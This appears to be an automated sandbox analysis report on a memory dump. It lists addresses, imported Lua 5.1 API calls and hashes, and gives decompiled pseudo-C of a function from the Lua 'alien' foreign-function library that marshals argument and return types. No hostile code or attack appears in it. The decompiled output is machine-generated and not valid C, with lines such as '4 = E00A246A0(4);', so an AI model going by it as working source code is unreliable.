0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tointeger.LUA5.1 ref: 00A22210
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tointeger.
String ID:
API String ID: 346420277-0
Opcode ID: a90fd7f0c9278c526ce424e3f9e5641c462fa66b8402f402b3163821ab45a7e3
Instruction ID: 34f439dfd1e44e9854f6a9c361b959c93e4c24404b2012f459f3e6b82641f38b
Opcode Fuzzy Hash: a90fd7f0c9278c526ce424e3f9e5641c462fa66b8402f402b3163821ab45a7e3
Instruction Fuzzy Hash: 11B1A4B5D04129ABCB04EB98FE81DEEBBB8FF49300F144528F441B7246D6399A15CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00A2224F, Relevance: 25.8, APIs: 17, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A2224F(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				long long* _t221;
				signed int _t223;
				char* _t224;
				signed int _t225;
				char* _t226;
				signed int _t237;
				void* _t244;
				void* _t246;
				intOrPtr _t247;
				intOrPtr _t248;
				void* _t267;
				signed int _t268;
				void* _t269;
				void* _t271;
				signed int _t272;
				intOrPtr _t274;
				intOrPtr _t275;
				void* _t276;
				long long _t286;

				L0:
				while(1) {
					L0:
					_t286 = __fp0;
					_t267 = __edi;
					E00A24686(8);
					 *((intOrPtr*)(_t272 - 8)) = _t274;
					_push(_t244);
					L00A23F68();
					_t221 =  *((intOrPtr*)(_t272 - 8));
					 *_t221 = __fp0;
					_t275 = _t274 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t272 - 0xc)) + __edi)) = _t221;
					while(1) {
						L36:
						 *((intOrPtr*)(_t272 - 0xc)) =  *((intOrPtr*)(_t272 - 0xc)) + 4;
						_t244 = _t244 + 1;
						_t116 = _t272 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t272 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t247 =  *((intOrPtr*)(_t272 - 0x14));
						_t258 =  *((intOrPtr*)(_t247 + 0x30));
						_t223 =  *( *((intOrPtr*)(_t272 - 0xc)) +  *((intOrPtr*)(_t247 + 0x30)));
						if(_t223 > 0x11) {
							L33:
							_t224 =  *(_t247 + 8);
							if(_t224 == 0) {
								_t224 = "anonymous";
							}
							_push(_t224);
							_push(_t244);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t270);
							L00A23F26();
							_t275 = _t275 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t223 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t242 = E00A246A0(4);
								 *((intOrPtr*)(_t272 - 8)) = _t275;
								_push(_t244);
								_push(_t270);
								L00A23F68();
								_t275 = _t275 + 8;
								_t243 = E00A245C0(_t242, _t286);
								_t257 =  *((intOrPtr*)(_t272 - 8));
								_t258 =  *((intOrPtr*)(_t272 - 0xc));
								 *_t257 = _t243;
								 *((intOrPtr*)( *((intOrPtr*)(_t272 - 0xc)) + _t267)) = _t257;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								goto L0;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L12:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L24:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L19:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t248 =  *((intOrPtr*)(_t272 - 0x14));
					 *((intOrPtr*)(_t272 - 0x3c)) = 0;
					_t225 =  *(_t248 + 0xc);
					if(_t225 > 0xc) {
						L58:
						_t226 =  *(_t248 + 8);
						if(_t226 == 0) {
							_t226 = "anonymous";
						}
						_push(_t226);
						_push("alien: unknown return type (function %s)");
						_push(_t270);
						L00A23F26();
						L61:
						_t276 = _t275 + 0xc;
						L62:
						 *((intOrPtr*)(_t272 - 0x24)) =  *((intOrPtr*)(_t272 - 0x24)) +  ~( *(_t272 - 0x48)) * 4;
						 *((intOrPtr*)(_t272 - 0x2c)) =  *((intOrPtr*)(_t272 - 0x2c)) -  *((intOrPtr*)(_t272 - 0x30));
						_t268 = 0;
						 *((intOrPtr*)(_t272 - 0x28)) =  *((intOrPtr*)(_t272 - 0x28)) +  ~( *(_t272 - 0x38)) * 4;
						if( *((intOrPtr*)(_t272 - 0x44)) <= 0) {
							L72:
							_pop(_t269);
							_pop(_t271);
							_pop(_t246);
							return E00A245A4( *((intOrPtr*)(_t272 - 0x30)) +  *((intOrPtr*)(_t272 - 0x34)) +  *(_t272 - 0x38) +  *(_t272 - 0x48) + 1, _t246,  *(_t272 - 4) ^ _t272,  *(_t272 - 0x48), _t269, _t271);
						} else {
							goto L63;
						}
						do {
							L63:
							_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t272 - 0x14)) + 0x30)) + _t268 * 4)) + 0xfffffff3;
							if(_t237 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t237 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t279 = _t276 - 8;
									 *_t279 = _t286;
									_push(_t270);
									L00A23F80();
									_t276 = _t279 + 0xc;
									 *((intOrPtr*)(_t272 - 0x24)) =  *((intOrPtr*)(_t272 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t268 = _t268 + 1;
						} while (_t268 <  *((intOrPtr*)(_t272 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t225 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t244, _t258, _t267, _t286,  *((intOrPtr*)(_t272 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t272 - 0x14)) + 4)), 0, _t267);
							_push(_t270);
							L00A23F74();
							_t276 = _t275 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a2224f
0x00a2224f
0x00a2224f
0x00a2224f
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225e
0x00a22263
0x00a22269
0x00a2226b
0x00a2226e
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
